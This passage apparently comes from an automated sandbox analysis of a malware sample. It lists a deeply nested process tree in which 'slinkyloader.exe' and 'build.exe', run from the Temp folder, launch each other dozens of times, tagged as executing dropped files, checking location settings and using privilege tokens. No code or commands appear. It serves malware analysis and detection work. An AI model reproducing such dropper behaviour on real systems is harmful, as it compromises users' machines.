        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        18⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        18⤵
        Executes dropped EXE
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        19⤵
        Executes dropped EXE
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        20⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3960
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        21⤵
        Executes dropped EXE
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        22⤵
        Executes dropped EXE
        
        PID:5312
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        23⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        24⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5928
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5972
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        25⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6084
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        25⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5136
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        26⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        26⤵
        Executes dropped EXE
        
        PID:368
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        27⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5348
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        27⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        28⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5712
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5812
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        29⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        29⤵
        Executes dropped EXE
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        30⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5992
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        30⤵
        Executes dropped EXE
        
        PID:5236
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        31⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5232
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        31⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5532
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        32⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5760
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        32⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3356
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        33⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1732
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        33⤵
        Executes dropped EXE
        
        PID:3048
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        34⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6100
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        34⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        35⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4964
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        35⤵
        Checks computer location settings
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        36⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6000
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        36⤵
        Checks computer location settings
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        37⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3652
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        37⤵
        Checks computer location settings
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        38⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        38⤵
        Checks computer location settings
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        39⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3940
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        39⤵
        Checks computer location settings
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        40⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3368
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        40⤵
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        41⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6308
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        41⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        42⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6452
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        42⤵
        
        PID:6504
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        43⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6604
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        43⤵
        Checks computer location settings
        
        PID:6664
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        44⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6760
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        44⤵
        Checks computer location settings
        
        PID:6820
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        45⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6904
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        45⤵
        Checks computer location settings
        
        PID:6964
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        46⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        46⤵
        Checks computer location settings
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        47⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4232
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        47⤵
        Checks computer location settings
        
        PID:6320
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        48⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        48⤵
        Checks computer location settings
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        49⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        49⤵
        Checks computer location settings
        
        PID:6740
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        50⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6888
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        50⤵
        Checks computer location settings
        
        PID:6972
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        51⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5592
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        51⤵
        
        PID:7120
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        52⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        52⤵
        
        PID:6104
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        53⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        53⤵
        Checks computer location settings
        
        PID:5752
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        54⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7040
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        54⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        55⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        55⤵
        Checks computer location settings
        
        PID:7188
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        56⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7308
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        56⤵
        
        PID:7352
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        57⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7456
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        57⤵
        
        PID:7500
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        58⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7604
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        58⤵
        Checks computer location settings
        
        PID:7656
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        59⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7752
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        59⤵
        Checks computer location settings
        
        PID:7808
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        60⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7904
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        60⤵
        
        PID:7960
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        61⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:8052
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        61⤵
        Checks computer location settings
        
        PID:8092
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        62⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1200
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        62⤵
        Checks computer location settings
        
        PID:5912
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        63⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7296
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        63⤵
        
        PID:7284
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        64⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        64⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        65⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5460
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        65⤵
        
        PID:7760
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        66⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7884
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        66⤵
        Checks computer location settings
        
        PID:7872
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        67⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        67⤵
        Checks computer location settings
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        68⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        68⤵
        
        PID:7216
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        69⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        69⤵
        
        PID:3844
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        70⤵
        
        PID:7768
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        70⤵
        
        PID:4148
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        71⤵
        
        PID:6660
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        71⤵
        
        PID:7972
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        72⤵
        
        PID:8176
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        72⤵
        Checks computer location settings
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        73⤵
        
        PID:7072
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        73⤵
        Checks computer location settings
        
        PID:3436
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        74⤵
        
        PID:8040
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        74⤵
        
        PID:8104
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        75⤵
        
        PID:6744
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        75⤵
        Checks computer location settings
        
        PID:7216
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        76⤵
        
        PID:3468
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        76⤵
        Checks computer location settings
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        77⤵
        
        PID:8104
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        77⤵
        Checks computer location settings
        
        PID:6944
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        78⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        78⤵
        Checks computer location settings
        
        PID:6112
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        79⤵
        
        PID:6484
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        79⤵
        Checks computer location settings
        
        PID:8208
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        80⤵
        
        PID:8296
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        80⤵
        
        PID:8352
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        81⤵
        
        PID:8440
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        81⤵
        
        PID:8480
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        82⤵
        
        PID:8596
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        82⤵
        
        PID:8652
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        83⤵
        
        PID:8744
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        83⤵
        
        PID:8800
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        84⤵
        
        PID:8892
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        84⤵
        Checks computer location settings
        
        PID:8932
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        85⤵
        
        PID:9044
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        85⤵
        
        PID:9100
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        86⤵
        
        PID:9192
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        86⤵
        Checks computer location settings
        
        PID:6832
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        87⤵
        
        PID:8224
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        87⤵
        Checks computer location settings
        
        PID:7496
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        88⤵
        
        PID:8412
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        88⤵
        Checks computer location settings
        
        PID:7272
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        89⤵
        
        PID:8572
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        89⤵
        
        PID:8492
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        90⤵
        
        PID:5832
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        90⤵
        Checks computer location settings
        
        PID:7256
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        91⤵
        
        PID:8716
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        91⤵
        
        PID:6576
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        92⤵
        
        PID:8812
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        92⤵
        Checks computer location settings
        
        PID:5896
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        93⤵
        
        PID:6972
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        93⤵
        Checks computer location settings
        
        PID:9188
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        94⤵
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        94⤵
        
        PID:8232
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        95⤵
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        95⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        96⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        96⤵
        Checks computer location settings
        
        PID:5128
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        97⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        97⤵
        Checks computer location settings
        
        PID:8652
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        98⤵
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        98⤵
        Checks computer location settings
        
        PID:8980
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        99⤵
        
        PID:9020
        
